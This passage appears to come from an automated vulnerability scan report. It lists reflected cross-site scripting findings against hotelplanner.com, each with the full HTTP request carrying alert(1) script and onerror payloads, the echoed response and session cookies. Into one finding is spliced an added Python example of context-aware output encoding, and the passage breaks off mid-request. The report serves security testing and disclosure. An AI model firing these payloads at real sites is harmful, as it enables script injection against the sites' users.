Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
================================================
Date: {ts '2011-10-02 19:10:31'}
==========================================================
Page: www.hotelplanner.com/ClickThrough.cfm?Source=IGoUGoec609--><script>alert(1)</script>6680255e979
==========================================================

Browser: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
IP: 50.23.123
...[SNIP]...

4.241. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /ClickThrough.cfm

Issue detail

The value of the Source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b90d"><script>alert(1)</script>0f7ca1148eb was submitted in the Source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ClickThrough.cfm?Source=IGoUGo5b90d"><script>alert(1)</script>0f7ca1148eb HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/ClickThrough.cfm?Source=IGoUGo5b90d"><script>alert(1)</script>0f7ca1148eb', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.242. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the NumRooms request parameter is copied into an HTML comment. The payload 93c35--><img%20src%3da%20onerror%3dalert(1)>e7ec9d7eeee was submitted in the NumRooms parameter. This input was echoed as 93c35--><img src=a onerror=alert(1)>e7ec9d7eeee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
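The remediation notes for 4.234 and 4.239 (JavaScript string), 4.235 through 4.238 (attribute value and text node) and 4.240 through 4.242 (HTML comment) all come down to one rule: encode the value for the context it lands in, at the point of output, and URL-encode it first when it is also part of a URL. The following is an added example, not code from booking.com, expedia.com, goal.com or hotelplanner.com; the template strings are assumed stand-ins for their server-side pages. It renders the same four fragments once as the report's responses show them and once with per-context encoding, using the exact probes from those findings.

```python
"""Context-aware output encoding for the reflection contexts in this report.
Added example; the template strings are assumed stand-ins for the sites'
server-side pages, not their real code."""
import html
import json
import re
from urllib.parse import urlencode

# Probes taken from findings 4.234 (JS string), 4.235 (attribute),
# 4.237 (text node) and 4.242 (HTML comment).
JS_STRING_PROBE = "ufi-P20061717a141a'-alert(1)-'2eed708b64a"
ATTR_PROBE = 'ufi-P20061717e3970"><script>alert(1)</script>ee37038bef'
TEXT_PROBE = "1f820<script>alert(1)</script>fc98f5f61bc4a03a9"
COMMENT_PROBE = "193c35--><img src=a onerror=alert(1)>e7ec9d7eeee"
BASE = "http://www.booking.com/searchresults.en.html?"


def js_string_literal(value):
    """Return a complete, double-quoted JS string literal safe inside <script>.
    json.dumps (default ensure_ascii) escapes quotes, backslashes, control
    characters and everything non-ASCII, U+2028/9 included; the replacements
    keep '</script>' from closing the block. json.dumps leaves ' alone, so
    never splice this into an existing single-quoted literal: emit it whole."""
    out = json.dumps(str(value))
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


def attr_value(value):
    """Encode for a double-quoted HTML attribute value."""
    return html.escape(str(value), quote=True)


def text_node(value):
    """Encode for character data between tags (same escaping; quotes are harmless here)."""
    return html.escape(str(value), quote=True)


def comment_safe(value):
    """Fallback for data inside <!-- -->: the only exits are '--' and '>'.
    Preferable: do not echo user input into comments at all."""
    return html.escape(re.sub(r"-(?=-)", "- ", str(value)), quote=False)


def render_vulnerable(utm_term, city, num_rooms):
    """Raw values dropped into each context, as the report's responses show."""
    return (
        f'<link rel="canonical" href="{BASE}utm_term={utm_term}" />\n'
        f"<script>booking.env.b_canonical_url = '{BASE}utm_term={utm_term}';</script>\n"
        f"<div>Please help us with your request for &quot;{city}&quot;</div>\n"
        f"<!-- Diagnostic: The value {num_rooms} cannot be converted to a number. -->\n"
    )


def render_hardened(utm_term, city, num_rooms):
    """Same fragments, each value encoded for the context it lands in."""
    url = BASE + urlencode({"utm_term": utm_term})     # URL-encode the component first
    return (
        f'<link rel="canonical" href="{attr_value(url)}" />\n'
        f"<script>booking.env.b_canonical_url = {js_string_literal(url)};</script>\n"
        f"<div>Please help us with your request for &quot;{text_node(city)}&quot;</div>\n"
        f"<!-- Diagnostic: The value {comment_safe(num_rooms)} cannot be converted to a number. -->\n"
    )


BREAKOUT_MARKERS = ("'-alert(1)-'", '"><script>', "<script>alert(1)", "--><img")


def surviving_markers(rendered):
    """Which probes' active fragments appear verbatim in the rendered output."""
    return [m for m in BREAKOUT_MARKERS if m in rendered]


def demo():
    """Render both versions with the report's probes; returns surviving markers."""
    args = [(JS_STRING_PROBE, TEXT_PROBE, COMMENT_PROBE), (ATTR_PROBE, "Boston", "1")]
    vuln = "".join(render_vulnerable(*a) for a in args)
    safe = "".join(render_hardened(*a) for a in args)
    return {"vulnerable": surviving_markers(vuln), "hardened": surviving_markers(safe)}
```

demo() returns all four break-out fragments for the vulnerable rendering and none for the hardened one. Two points the report's remediation text does not spell out: the canonical URL is a URL before it is an attribute or a string, so the query component is URL-encoded first and the result is then attribute-encoded or JSON-encoded for its slot; and for the comment case the NumRooms value should be validated as an integer before anything is rendered, with the diagnostic comment carrying no user input, comment_safe being only the fallback when an error page insists on echoing it.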

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=193c35--><img%20src%3da%20onerror%3dalert(1)>e7ec9d7eeee&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 193c35--><img src=a onerror=alert(1)>e7ec9d7eeee cannot be converted to a number. <br>
...[SNIP]...

4.243. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the NumRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aacd"><script>alert(1)</script>dc4429b387f was submitted in the NumRooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=16aacd"><script>alert(1)</script>dc4429b387f&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=16aacd"><script>alert(1)</script>dc4429b387f&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.244. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the NumRooms request parameter is copied into the HTML document as plain text between tags. The payload ee4c1<img%20src%3da%20onerror%3dalert(1)>2c29a2f448 was submitted in the NumRooms parameter. This input was echoed as ee4c1<img src=a onerror=alert(1)>2c29a2f448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1ee4c1<img%20src%3da%20onerror%3dalert(1)>2c29a2f448&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<font color="FFFFFF">The value 1ee4c1<img src=a onerror=alert(1)>2c29a2f448 cannot be converted to a number. <br>
...[SNIP]...

4.245. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hotelID request parameter is copied into the HTML document as plain text between tags. The payload d2b59<img%20src%3da%20onerror%3dalert(1)>5dfd56ea543 was submitted in the hotelID parameter. This input was echoed as d2b59<img src=a onerror=alert(1)>5dfd56ea543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791d2b59<img%20src%3da%20onerror%3dalert(1)>5dfd56ea543&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:31:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<font color="FFFFFF">The value 113791d2b59<img src=a onerror=alert(1)>5dfd56ea543 cannot be converted to a number. <br>
...[SNIP]...

4.246. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hotelID request parameter is copied into an HTML comment. The payload 13eff--><img%20src%3da%20onerror%3dalert(1)>68159f7f99a was submitted in the hotelID parameter. This input was echoed as 13eff--><img src=a onerror=alert(1)>68159f7f99a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=11379113eff--><img%20src%3da%20onerror%3dalert(1)>68159f7f99a&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:31:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 11379113eff--><img src=a onerror=alert(1)>68159f7f99a cannot be converted to a number. <br>
...[SNIP]...

4.247. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hotelID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8db"><script>alert(1)</script>33e3d0a441 was submitted in the hotelID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=1137917b8db"><script>alert(1)</script>33e3d0a441&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:31:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=1137917b8db"><script>alert(1)</script>33e3d0a441&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.248. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hrnQuoteKey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hrnQuoteKey request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cef9"><script>alert(1)</script>d4ca531d628 was submitted in the hrnQuoteKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab5cef9"><script>alert(1)</script>d4ca531d628 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab5cef9"><script>alert(1)</script>d4ca531d628', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.249. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [inDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the inDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685bb"><script>alert(1)</script>e49ec68931d was submitted in the inDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11685bb"><script>alert(1)</script>e49ec68931d&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
